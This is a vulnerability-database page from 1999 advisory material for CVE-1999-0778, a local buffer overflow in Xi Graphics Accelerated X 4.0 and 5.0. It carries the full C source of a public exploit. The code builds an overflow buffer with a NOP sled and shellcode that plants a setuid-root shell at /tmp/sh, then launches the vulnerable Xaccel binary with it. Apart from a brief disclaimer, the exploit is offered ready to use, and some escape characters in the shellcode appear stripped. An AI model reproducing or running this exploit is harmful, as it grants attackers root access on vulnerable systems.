exploits , vulnerabilities , articles , Accelerated X Buffer Overflow Vulnerabilities

Title	Accelerated X Buffer Overflow Vulnerabilities
Published	1999-06-25-12:00AM
Updated	1999-06-25-12:00AM
Class	Boundary Condition Error
CVE	CVE-1999-0778
Remote	No
Local	Yes
Credit	First posted to BugTraq in a KSR[T] advisory by KSR[T] Contact Account <ksrt@ksrt.org> on June 26, 1999.
Vulnerable	Xi Graphics Accelerated X 5.0 Xi Graphics Accelerated X 4.0 .x
Not Vulnerable	Xi Graphics Accelerated X 5.0.2
Code	--- SDIaccelX.c ---- /* * SDI linux exploit for Accelerate-X * Sekure SDI - Brazilian Information Security Team * by c0nd0r <condor@sekure.org> * * This script will exploit a vulnerability found by KSRT team * in the Accelerate-X Xserver [<=5.0]. * * -------------------------------------------------------------------- * The vulnerable buffer was small so we've changed the usual order to: * [garbage][eip][lots nop][shellcode] * BTW, I've also changed the code to execute, it will create a setuid * shell owned by the superuser at /tmp/sh. * -------------------------------------------------------------------- * * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no * responsability. * * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia, * marty (NORDO!), vader, fcon, slide, c_orb and * specially to my sasazita. Also toxyn.org, pulhas.org, * superbofh.org (Phibernet rox) and el8.org. * * Laughs - lame guys who hacked the senado/planalto.gov.br * pay some attention to the site: SecurityDot.net (good point). * see you at #uground (irc.brasnet.org) */ #include <stdio.h> /* generic shellcode */ char shellcode[] = "xebx31x5ex89x76x32x8dx5ex08x89x5ex36" "x8dx5ex0bx89x5ex3ax31xc0x88x46x07x88" "x46x0ax88x46x31x89x46x3exb0x0bx89xf3" "x8dx4ex32x8dx56x3excdx80x31xdbx89xd8" "x40xcdx80xe8xcaxffxffxff" "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"; main ( int argc, char *argv[] ) { char buf[1024]; int x, y, offset=1000; long addr; int joe; if (argc > 1) offset = atoi ( argv[1]); /* return address */ addr = (long) &joe + offset; buf[0] = ':'; for ( x = 1; x < 53; x++) buf[x] = 'X'; buf[x++] = (addr & 0x000000ff); buf[x++] = (addr & 0x0000ff00) >> 8; buf[x++] = (addr & 0x00ff0000) >> 16; buf[x++] = (addr & 0xff000000) >> 24; for ( ; x < 500; x++) buf[x] = 0x90; for ( y = 0; y < strlen(shellcode); y++, x++) buf[x] = shellcode[y]; fprintf (stderr, " SDI Xaccel - Offset: %d | Addr: 0x%x ", offset, addr); buf[strlen(buf)] = ''; execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0); // setenv ( "EGG", buf, 1); // system ( "/bin/sh"); } ----- EOF ----------
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-21 SocialEngine HTTP Response Splitting and SQL-injection Vulnerabilities
• 2008-11-21 Oracle Database Vault Privilege Escalation Vulnerability
• 2008-11-20 GeSHi XML Parsing Remote Denial Of Service Vulnerability
• 2008-11-20 Softbiz Classifieds Script Cross Site Scripting Vulnerability
• 2008-11-20 P3nfs Insecure Temporary File Creation Vulnerability
• 2008-11-20 Easyedit Multiple SQL Injection Vulnerabilities
• 2008-11-20 SystemImager Insecure Temporary File Creation Vulnerabilities
• 2008-11-20 Yasna Yazd Discussion Forum Multiple Cross-Site Scripting Vulnerabilities
• 2008-11-20 phpBLASTER CMS Multiple Local File Include Vulnerabilities
• 2008-11-19 Symantec Backup Exec Data Management Protocol Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:15:46 +0000